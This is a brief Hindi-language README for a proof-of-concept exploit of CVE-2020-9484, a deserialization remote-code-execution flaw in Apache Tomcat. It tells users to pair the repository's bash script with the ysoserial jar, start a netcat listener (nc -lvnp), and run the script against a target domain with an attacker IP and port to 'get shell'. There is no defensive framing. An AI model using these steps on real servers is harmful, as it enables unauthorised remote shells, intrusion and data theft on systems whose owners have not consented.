
CVE-2020-9484 के लिए POC
CVE-2020-9484 के लिए POC
Apache Tomcat RCE डिसीरियलाइज़ेशन द्वारा (CVE-2020-9484)
दस्तावेज़ देखें »
1. इस रिपॉजिटरी को क्लोन करें, फिर आप CVE-2020-9484 का उपयोग कर सकेंगे और यदि आवश्यक हो तो स्रोत कोड को संशोधित कर सकते हैं।
2. ysoserial जार डाउनलोड करें
3. CVE-2020-9484 और ysoserial.jar दोनों को एक ही निर्देशिका में रखें
4. शेल प्राप्त करें!
CVE-2020-9484 के उपयोग को सुव्यवस्थित करने के लिए एक सरल bash स्क्रिप्ट लिखी गई है।
शोषण के समय आपको एक नेटकैट लिसनर तैयार रखना होगा।
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
